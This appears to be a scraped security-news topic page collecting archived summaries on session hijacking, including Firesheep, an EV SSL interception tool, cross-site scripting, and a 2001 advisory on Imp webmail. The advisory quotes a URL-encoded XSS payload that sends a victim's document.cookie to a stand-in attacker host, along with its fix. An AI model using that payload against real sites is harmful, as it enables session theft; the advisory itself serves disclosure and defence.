Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found 4 articles for you...
83
security enhancementfirefoxweb securityBlackSheep Plugin Enhances Firefox Security Against FireSheep Hijacks
With more than 600,000 copies of the FireSheep browser plug-in downloaded in a matter of weeks, Web security firm zScaler have released a new Firefox plug-in, BlackSheep, in hopes of combating attempts by those using FireSheep to try to hijack their Web session. . The plug-in doesn The link for this article located at ThreatPost is no longer available. . SilverWolf battles against ShadowWolf's data breach through an innovative app crafted specifically for Chrome users.. BlackSheep Plugin, Session Hijacking Prevention, Firefox Security. . LinuxSecurity.com Team
Nov 10, 2010
•
Hacks/Cracks
67
network threatsdata protectionopen sourceExploring Firesheep's Role in WiFi Security Risks and Protection
An open-source Firefox extension called Firesheep has shined a spotlight on just how insecure it is to use unprotected WiFi networks. It's widely known that unprotected WiFi networks make sensitive data readily available for anyone with the technical skill necessary to find it, as demonstrated by Google's four-year Street View WiFi data gathering odyssey. . Google got into trouble for being unaware that software in its Street View cars was vacuuming data, but those broadcasting sensitive information over their networks and those running Web services with inadequate security somehow escaped blame. That may change, thanks to Firesheep, which allows anyone to scan unprotected WiFi networks for users who are logged into Facebook, Twitter, Google, Amazon, and a variety of other Web 2.0 services and to impersonate those users by hijacking their session cookie. The link for this article located at Information Week is no longer available. . WiFi vulnerabilities come to light with Firesheep, highlighting the dangers of unsecured connections that jeopardize user information and facilitate account takeovers.. firesheep, wifi security, open source protection, session hijacking. . LinuxSecurity.com Team
Nov 02, 2010
•
Cryptography
79
security flawnetwork threatprivacy riskFiresheep Wi-Fi Exploit: Threats of Facebook and Twitter Session Hijacking
Over the last few days, the internet was lit up by reports of a security hole in the Firefox web browser that allowed anyone to hack into Facebook, Twitter, Yelp or Tumblr. A freelance programmer named Eric Butler wrote an extension to Firefox (which anyone can install) that exploits this hole by grabbing free-floating cookies in Wi-Fi networks attached to the above-named sites. . The extension, called Firesheep, takes advantage of a widely known flaw in Wi-Fi setups. When a user logs into his or her Facebook account, the social network's servers authenticate the user via log-in and password information. Once that person is authenticated, Facebook sends a cookie to that user's browser to enable access. After the cookie is sent, however, the connection no longer runs on a secure layer, sometimes known as the HTTPS protocol, what is essentially a persistent form of authentication. Online banking operations, for example, only allow for persistent authentication. Facebook and Twitter, however, do not. In most situations, the lack of a continuous secure connection is not a problem, as the authentication cookie sits on the user's browser and is not easy to hack. But on public Wi-Fi networks, these cookies are literally floating through the air, a flaw that Firesheep exploits by grabbing them and allowing anyone who has installed the Firesheep extension to access a Facebook session started by someone on any wireless network. The link for this article located at Advertising Age is no longer available. . The extension, called Firesheep, takes advantage of a widely known flaw in Wi-Fi setups. When a user. internet, reports, security, firefox. . LinuxSecurity.com Team
Oct 27, 2010
•
Security Projects
83
cyber threatonline securityhacking risksUnderstanding Firesheep Risks with Session Hijacking Threats
Want to hack someone else's Amazon, Facebook, Twitter or Windows Live account in just one click? A Firefox extension called Firesheep claims you can by hijacking a person's current user session over an open Wi-Fi connection.. I tested the extension out and to my horror it works as advertized - almost that is. Firesheep was created by Seattle-based software developer Eric Butler who said he created the extension to highlight the security risks associated with session hijacking, also known as sidejacking. Firesheep targets 26 online services, and includes many popular online services such as Amazon, Facebook, Foursquare, Google, The New York Times, Twitter, Windows Live, Wordpress and Yahoo. The extension is also customizable allowing a hacker to target other Websites not listed by Firesheep. The link for this article located at Network World is no longer available. . The Firesheep plugin uncovers vulnerabilities by allowing the interception of session data across various platforms on unsecured networks.. Session Hijacking, Firefox Extension, Online Exploits, Hacking Tools, Cybersecurity. . LinuxSecurity.com Team
Oct 26, 2010
•
Hacks/Cracks
67
security toolcybersecuritysession hijackingBlack Hat USA: New Tool for Silent EV SSL Session Hijacking Unveiled
If you think you're safe from man-in-the-middle (MITM) attacks as long as you're visiting an Extended Validation SSL (EV SSL) site, then think again: Researchers will release a new tool at Black Hat USA later this month that lets an attacker hack into a user's session on an EV SSL-secured site. . Mike Zusman and Alex Sotirov -- who in March first demonstrated possible MITM attacks on EV SSL at CanSecWest -- will release for the first time their proxy tool at the Las Vegas conference, as well as demonstrate variations on the attacks they have discovered. The Python-based tool can launch an attack even with the secure green badge displaying on the screen: "It doesn't alert the user that anything fishy is going on," says Zusman, principal consultant at Intrepidus. The link for this article located at Dark Reading is no longer available. . Experts set to demonstrate a covert method for intercepting EV SSL transactions during Black Hat USA, evading detection mechanisms.. EV SSL, session Hijacking, cybersecurity Threats, security Tools. . LinuxSecurity.com Team
Jul 14, 2009
•
Cryptography
74
risk managementweb applicationsecurity risksUnderstanding Session Hijacking Risks In Web Applications
For the first learning session on Help Net Security, we've got Caleb Sima, SPI Dynamics CTO and co-founder, discussing session hijacking attacks. While session hijacking can be applied to a lot of areas, this learning session is concentrated to the attacks on web applications. . . .. For the first learning session on Help Net Security, we've got Caleb Sima, SPI Dynamics CTO and co-founder, discussing session hijacking attacks. While session hijacking can be applied to a lot of areas, this learning session is concentrated to the attacks on web applications. In this eleven minute audio, Mr. Sima traverses through all the important characteristics of session hijacking and presents a number of practical examples of these attacks on online e-commerce sites. The link for this article located at net-security.org is no longer available. . Embark on a journey with Caleb Sima as he delves into the world of cross-site scripting vulnerabilities and their ramifications for online platforms and retail websites.. Session Hijacking, Web Application Security, E-Commerce Security, Risk Management. . Anthony Pell
Apr 22, 2004
•
Network Security
83
XSSsession hijackingweb application securityCross-Site Scripting Risks And Remediation Strategies For Web Applications
Blair pointed us to an article on XSS. "Cross-site scripting is a potentially dangerous security exposure that should be considered when designing a secure Web-based application. Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker. An attacker can take over the user session before the user's session cookie expires. An attacker can connect users to a malicious server of the attacker's choice. This article describes the nature of the exposure, how it works, and has an overview of some recommended remediation strategies.". . .. Blair pointed us to an article on XSS. "Cross-site scripting is a potentially dangerous security exposure that should be considered when designing a secure Web-based application. Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker. An attacker can take over the user session before the user's session cookie expires. An attacker can connect users to a malicious server of the attacker's choice. This article describes the nature of the exposure, how it works, and has an overview of some recommended remediation strategies." Most Web sites today add dynamic content to a Web page making the experience for the user more enjoyable. Dynamic content is content generated by some server process, which when delivered can behave and display differently to the user depending upon their settings and needs. Dynamic Web sites have a threat that static Web sites don't, called "cross-site scripting," also known as "XSS." "A Web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser user interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if untrusted content can be introduced into adynamic page, neither the Web sites nor the client has enough information to recognize that this has happened and take protective actions," according to CERT Coordination Center, a federally funded research and development center to study Internet security vulnerabilities and provide incident response. The link for this article located at IBM developerWorks is no longer available. . Cross-site scripting (XSS) continues to be a leading security threat for web applications, enabling attackers to inject malicious scripts into sites.. Cross Site Scripting, XSS Security, Dynamic Web Threats. . LinuxSecurity.com Team
Sep 24, 2002
•
Hacks/Cracks
77
security advisorycross-site scriptingsecurity riskImp Webmail Advisory: Session Hijacking Exploit Threatens Security
Joao Pedro reports that "It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper.". . .. Joao Pedro reports that "It's possible to hijack an imp/horde session using a cross-site script attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper." - After hijacking the cookies, the attacker can use the session and read the victim's mail. - Imp webmail is part of the Horde Application Framework, at https://www.horde.org/ , which allows web access to an email account, through pop3 or imap. - Imp is included in the Linux Madrake, Conectiva Distributions. It's also available in the Red Hat PowerTools. - It's used in several webmail sites, some of which with hundreds of thousand of users, and all of the ones tested were vulnerable. Some of the administrators were warned before this advisory being public. Some have already been patched. - All stable imp webmail versions, up to 2.2.6 including are vulnerable, the devel version, 2.3 and 3.0 Release Candidate 1 are not affected by this vulnerability. - The horde team was warned about this and have commited a fix, a new version should be uploaded soon. - To apply the patch use https://dev.horde.org/horde/login.php or just escape the $message variable $message = htmlspecialchars($message); if your imp installation is already heavily customized. - To exploit this vulnerability using a text message, the attacker sends an email with a url, where if the user clicks, is redirected to %3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B% 20%27%3E%27)%3B%3C%2Fscript%3E%0A which in return redirects the user's browser to the attacker's server where he hijacks the cookies that the browser used in the context of the webmail site, and the session therefore. This attack isjust one more example on how trusting user input is a Bad Thing(tm), as well as the risks inherent to cross-site script attacks. Please, pretty please, this was discovered while playing around with cookie-based session sites, after reading about the MS Wallet attack and saw how almost 2 years after the CERT advisory on these techniques, lots of applications are still vulnerable. There are probably lots of kids around exploiting similar vulnerabilities. So check your web applications for similar vulnerabilities and ask yourself how many times have you pasted directly into the html some variable passed by the url or cookie. - For more info on cross-site scripting, read CERT advisory and Marc Slemko's paper. Imp Project homepage: https://www.horde.org/apps/imp/ Marc Slemko's "Microsoft Passport to Trouble": CERT advisory on cross-site scripting https://www.sei.cmu.edu/library/2000-cert-advisories/ João Pedro Gonçalves
Nov 12, 2001
•
Server Security
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Discover faster search, smarter navigation, and deeper Linux security insights. Read More